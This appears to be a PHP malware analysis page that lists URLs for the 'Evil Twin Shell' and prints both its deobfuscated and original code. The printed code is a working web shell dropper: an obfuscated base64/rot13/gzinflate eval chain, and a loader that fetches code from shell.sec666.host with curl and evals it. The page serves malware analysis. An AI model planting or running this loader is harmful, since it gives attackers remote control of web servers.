PHP Malware Analysis

Back to list

Tags

URLs
https://github.com/eviltwin-id/eviltwin-shell
https://shell.sec666.host/sh3e3e3e3e3e3e3ellll
Execution
eval

Deobfuscated code

<?php

// Evil Twin Shell
// Download : https://github.com/eviltwin-id/eviltwin-shell
// Mini Size But Many Features!
$auth_pass = "03b8e16719bdfb9b60544bd0403d9d53";
eval /* PHPDeobfuscator eval output */ {
    $X = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEZhZGx5MzEzMzclMjklMjklMjklMjklMjklMjklMjklMjklM0I=";
    $Fadly31337 = "==w6/8mVk7CrfCwBvV2yNnWqSeqrn+mbhOKmWqVnp1KVMoZkaVZ2EmsV0SNMRJdDzZ3C0LXCLIfDJ0gcPkICPEv8N4AcRddyQFNKvkcLO1y6GQ71QBCHDLypYoYAu8CyLP9MzYTTOtS0J3MSO/y1SbLKpkCKPDV0ssMzPnoyt4CSVB7VJLV5gjCyvE7sci3/2BQiBwJe/vGAUGw/mBQmB8fYA4ZA";
    eval /* PHPDeobfuscator eval output */ {
        $o = curl_init('https://shell.sec666.host/sh3e3e3e3e3e3e3ellll');
        curl_setopt($o, CURLOPT_RETURNTRANSFER, 1);
        $i = curl_exec($o);
        eval('?>' . $i);
    };
    exit;
};


Original code

<?php
// Evil Twin Shell
// Download : https://github.com/eviltwin-id/eviltwin-shell
// Mini Size But Many Features!
$auth_pass = "03b8e16719bdfb9b60544bd0403d9d53"; // eviltwin.id
eval(str_rot13(gzinflate(str_rot13(base64_decode("\152\x59\x39\127\x59\x71\x4e\x41\105\111\x58\x76\111\x38\x31\x2f\151\103\x49\x66\x4d\x73\161\102\x63\x34\154\x6b\x46\x50\x6e\101\142\53\167\117\116\114\123\170\167\x39\x4b\130\105\143\x62\107\x78\156\x5a\x4a\x42\x30\57\63\162\167\x2b\x57\x6b\x73\x4d\143\112\x6c\144\x57\x6e\60\x66\x76\154\126\x64\164\x59\155\57\146\172\107\x4a\150\x6b\x59\62\66\103\x71\x2b\157\x50\161\x49\154\107\67\107\123\x57\154\116\101\115\117\x49\x77\70\157\x36\123\x42\161\70\113\163\x2f\x2f\x6e\x61\125\x39\154\113\x6b\x6c\143\171\171\166\142\157\70\x6a\127\151\155\115\x5a\x4b\x50\x2f\x78\60\x6f\161\152\x7a\114\105\130\x37\x43\146\x61\64\x5a\x73\103\114\122\61\147\127\101\x76\155\126\x59\x38\x44\x73\163\132\x63\x4c\x78\161\x6f\153\65\101\x31\x2f\130\122\x54\110\x32\x68\61\53\57\160\x41\103\162\x38\147\x55\152\x31\172\110\114\x34\x48\102\120\x50\142\x70\x39\x2b\x2f\112\160\165\x79\142\153\x63\127\143\x6b\171\71\x31\160\67\120\x7a\x30\132\165\x78\165\x47\x67\64\163\115\x46\156\x37\x30\143\126\x33\104\106\x35\67\x33\x56\x37\x67\57\x4a\x50\141\x38\66\x50\145\114\120\145\65\151\x6b\x62\x77\124\x4a\x44\147\60\x6c\125\132\114\120\x4d\167\147\x73\x6a\x53\172\x43\143\61\60\147\107\x59\x50\x59\x78\x6d\x52\152\x54\111\146\x67\162\x54\141\x47\x41\x42\164\x2b\120\164\115\125\164\x31\64\60\x44\124\125\63\x54\x5a\x51\120\x61\113\171\x4c\132\x37\x6f\61\123\116\110\x30\x38\115\x73\66\x70\161\155\x7a\132\164\172\x54\x44\116\x50\131\x61\x79\123\x46\x73\61\x7a\x71\x56\101\165\105\x4d\162\106\156\147\131\x70\112\x46\x56\124\160\x67\103\116\167\x44\125\x36\127\x6b\x63\x4a\126\x61\x66\x53\157\x59\101\x74\x74\113\147\170\167\x2b\120\104\x32\x6a\x6e\x62\x75\161\60\172\144\171\64\x4c\x6b\155\x62\x31\x71\104\154\x73\150\63\67\x71\162\67\125\x7a\147\156\163\x6d\71\x32\x63\126\x6b\106\x65\x52\x65\66\x37\132\163\x79\145\x36\66\x49\63\x52\115\62\164\132\71\171\145\161\165\x50\110\106\57\x6d\x37\x62\x65\116\145\63\x64\66\x63\x41\x2b\164\66\162\115\x32\161\156\x79\x35\x55\x4c\x73\x50\53\x4e\x63\166\61\x2f\x37\64\71\115\110")))));
?>